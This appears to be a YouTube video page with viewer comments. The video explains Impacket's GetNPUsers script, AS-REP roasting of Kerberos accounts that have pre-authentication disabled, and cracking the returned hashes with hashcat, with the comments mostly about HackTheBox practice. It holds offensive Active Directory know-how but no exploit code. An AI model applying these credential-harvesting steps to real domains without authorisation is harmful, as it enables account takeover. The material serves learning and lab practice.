Taking a look at the Impacket GetNPUsers.py script and explaining a little bit about Kerberos pre-authentication. Impacket: www.secureauth... Kerberos RFC: tools.ietf.org... My blog: vbscrub.com
Пікірлер: 67
@vbscrub4 жыл бұрын
2:00 - Using GetNPUsers to get encrypted data 3:43 - Cracking the password in hashcat 5:12 - Explaining what makes an account vulnerable to this script 7:29 - LDAP query to find vulnerable users 11:04 - Wireshark capture of kerberos traffic when we run the script 15:05 - Explaining what kerberos pre authentication is 17:50 - Summary
@cbesc2 жыл бұрын
Gold mine of a channel. The way you explain it takes me back to the 2600 quarterly days.
@flo97ist4 жыл бұрын
Great Video, really looking forward to that active directory one. I like that you mention the real world relevance
@MohdAnees-rv7te2 жыл бұрын
Your videos have lot of depth. It makes easier for me to remember as all put together make sense. Thank You and please keep posting more videos.
@isitreally4 жыл бұрын
Great job man. I've always wanted to see how the bad configuration that we exploit actually looks from the other side. Looking forward to more of your videos. Cheers!
@mikemutter4521 Жыл бұрын
your videos are great! clear, understandable and precise! Thanks for the time you put into this its helping me get ready for the OSCP
@vbscrub Жыл бұрын
no worries, glad it helped
@georgegreen91454 жыл бұрын
Now that you explained it, it seems so obvious. In the HTB forums people gave the hint of using impacket. Most scripts l tried required the user's password and that put me off. Come to find out l missed out on this important script. Great video mate! More AD videos please
@vbscrub4 жыл бұрын
yeah its one of those things that you either know about or you don't. The first time I had to use it on a HTB box I felt like it was pretty harsh as there's no hint that that's what you need to do. But I guess it teaches you to always just try these things anyway
@steps0x029a4 жыл бұрын
Thanks for sharing this video! That really helped me understand why GetNPUsers actually works and how it looks like from the other side. Next up is your AD video, guess I'll learn quite a lot from that (as I don't know that much about AD). Thanks again, talk to you on HTB later
@tech04943 жыл бұрын
More videos please ❤️❤️
@mohamedraheem10504 жыл бұрын
Thanks bro. , so much informative . I would like to see more of this describing videos for CTF and exploiting tools and how it works
@vbscrub4 жыл бұрын
Thanks and yeah there will be more videos like this coming soon :)
@cybersamurai993 ай бұрын
This was useful thank you
@pauliehorgan4 жыл бұрын
Nice video, should explain to people why they are running that script instead of them just doing it automatically
@hxmo6564 жыл бұрын
Really loved this video man, it helped me understand AD more and I finally understand the syntax for GetNPUusers lol. Definitely make another AD video on post exploitation to get DA ! Cheers
@ProCipher4 жыл бұрын
I paused the video more than 3 times to give a like :) GJ & Thanks bro
@caiochaves95504 жыл бұрын
Great video!!
@ibrahimalnafisi4323 жыл бұрын
Amazing. Thanks
@nopnopnopnopnopnopnop3 жыл бұрын
Thank you!
@teamgoogle27132 жыл бұрын
Hi! Your videos are amazing and I'm glad I finally found someone who goes into as much depth as I need. You're brilliant, man. Never stop posting. You honestly leave no room for doubts because you're so detailed with everything and you have no idea how much an overthinker like me appreciates that. I just had one question, were you able to figure out how hashcat/john the ripper works behind the scenes to actually crack the password. I've been hammering my head trying to find that out but it's just a rabbit hole. Could you please help me out with this?
@vbscrub2 жыл бұрын
I found out roughly how it works yeah. It looks for specific values in specific locations that are always the same once decrypted. So say the 10th byte in the data always has a value of 80 when the data has been decrypted, it can keep checking for that value after it tries every potential password in the word list and when it sees that value then it knows it has the correct password. Obviously its normally based on more than just one byte so that its more reliable but yeah that's basically it. If you look at the hashcat source code on github you can see the actual values it checks for are mentioned in a comment: github.com/hashcat/hashcat/blob/master/OpenCL/m18200_a0-pure.cl
@gizmet64674 жыл бұрын
This is perfect! thank you for the video VB! :)
@raghav76334 жыл бұрын
Amazing video. Paused in between just to subscribe and like. Hope to see more content. Just a suggestion you could start a series for noobs like me who just shifted their focus from linux priv esc to windows.
@vbscrub4 жыл бұрын
Thanks :) I did do an hour long video introducing people like yourself to active directory so take a look at that one if you've not seen it already. Its called AD Basics
@MayankMalhotra-ig6vl Жыл бұрын
The best!!!!!!!!!!!!!!!!!!!
@stevieberg25404 жыл бұрын
Thanks for the video! Really helped for a Hackthebox challenge. Subscribed and will watch the other videos cause they seem interesting.
@vbscrub4 жыл бұрын
cheers, glad to hear that
@dojoku884 жыл бұрын
thanks a lot VB. This is perfect!
@SP-hz5tp4 жыл бұрын
Awesome! Please consider creating more of those explainations of common tools and techniques! Subscribed! P.S: Could you cover silver and golden tickets or some more Kerberos in general...
@vbscrub4 жыл бұрын
thanks! and yeah that's a good idea, a quick video explaining golden tickets would be easy enough to do
@SP-hz5tp4 жыл бұрын
VbScrub Nice! Appreciate it! :)
@CarricDooley4 жыл бұрын
Great content! "Waffling on" was not a probem at all! =)
@swift871004 жыл бұрын
Great job dude!! You earned a subscriber!!
@CodeXND4 жыл бұрын
Thank you ..very informative
@vbscrub4 жыл бұрын
no problem :) more coming soon
@whitefighter59284 жыл бұрын
great job !
@jumpstep70854 жыл бұрын
damnit, Thats very surprising - I didn't realize it didn't reflect a real world situation. If not this, what do you think are the most commonly exploited Windows/Windows Active Directory vulnerabilities when it comes to getting a foothold?? Thanks heaps for the video @VBScrub
@CatSmiling4 жыл бұрын
ty for this brah
@robinhood38412 жыл бұрын
2:24 when we specify valid user on the domain, dont we get more result compared to anonymous user? I mean i encountered ctf machines where i didnt be able to perform this attack unless i got a valid user on the domain which gives me access to more users
@soumyanilbiswas_reveng0073 жыл бұрын
Sir, I'm still confused about AS-Rep roasting. We are capturing TGT and TGT is encrypted by krbtgt LT key. So after cracking hash should we not get the real passwd of krbtgt service account password rather getting user account passwords ?? When I saw your theory video, i saw that TGT is encrypted by krbtgt acc. passwd, but when I did practical in my home lab, I saw the same thing, that I got passwd hashes of users which has pre-auth disabled... What am I lacking ???
@dharanisanjaiy Жыл бұрын
See 19:12 timestamp. He is requesting hash for jsmith user so the KDC will encrypt the TGT key with jsmith's password. Thats y we can able to retrieve jsmith's pass. Whereas for other user, the KDC needs their password to encrypt thats why it showed error
@kasireddyvenki54214 жыл бұрын
good video bro
@westernvibes12674 жыл бұрын
Amazing work explaining why and when to use these.. i was so lost and confused by these tools. By the way can you tell how to extract gpp passwords when get access to sysvol shares? I mean you just search through it manually or is there any tool?
@vbscrub4 жыл бұрын
there are tools that get the GPP passwords yeah. Just google it and you'll find some powershell scripts that do it
@nicksmith56544 жыл бұрын
Hey I can use your help! I'm trying to run GetNPUsers with a -userslist tag and end up here --> GetNPUsers.py: error: unrecognized arguments: -usersfile user.txt ... I can't seem to find -usersfile in the usage options --> usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target What do you think? Thank you in advance!
@frankdSda4 жыл бұрын
what u do to run directly python script from cmd without use hearder line "python3 name.py" example! AND NICE VIDEO !!!!
@urnotalone693 жыл бұрын
the fun thing is that you explained all of this but forgot how to explain and to show how to download it xd
@lonixlon3 жыл бұрын
so i guess hashcat tries to decrypt the data with all the keys in the wordlist untill non-garbage is returned?
@SnakePlissken12 жыл бұрын
Dude how did you get this to run on Windows? C:> is DOS??
@jonathancsoy4 жыл бұрын
Well...still not working for me. The same error appears. Can you please write the sintax with in Linux?
@6cylbmw4 жыл бұрын
I just tried what you said in the video (using the script with and without specifing usernames) on a htb machine, but it does not work when Im not specifying the username.
@vbscrub4 жыл бұрын
depends which machine. On one of the currently live machines you can do it without specifying a username and it will find a result because anonymous logon has permission to view everything in AD. In another one you need the username because anonymous logon does not have permission to view the user account that has this option set, so the LDAP query the script runs will not find any results
@sva84204 жыл бұрын
when i'm using GetNPUsers i got ("No entries found!")
@6cylbmw4 жыл бұрын
Greate one. It feels like you are a little rushed and considering what you said in the last videos I suppose you are afraid your videos may be too long. Tbh, for me could be even hours long if you feel like that would be needed. Im really looking forward the AD video.
@vbscrub4 жыл бұрын
Thanks for the feedback I'll bear that in mind for the next one, cheers
@sva84204 жыл бұрын
when i'm using GetNPUsers i got ("No entries found!")
@sva84204 жыл бұрын
when i'm using GetNPUsers i got ("No entries found!")
@sva84204 жыл бұрын
when i'm using GetNPUsers i got ("No entries found!")
@sva84204 жыл бұрын
when i'm using GetNPUsers i got ("No entries found!")
@sva84204 жыл бұрын
when i'm using GetNPUsers i got ("No entries found!")
@vbscrub4 жыл бұрын
maybe there are no accounts with kerberos pre auth disabled in the domain you are running it against? Either that or there are some accounts but you do not have permission to view them. On some of the CTF machines I've done, you need to know the username of the user first. Then you run it with domain.local/username instead of just domain.local/
@sva84204 жыл бұрын
@@vbscrub i try this and i got " Password: [*] Cannot authenticate administrator, getting its TGT [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set"
@sva84204 жыл бұрын
coming from "S@un@ server HTB" :\ if know what i mean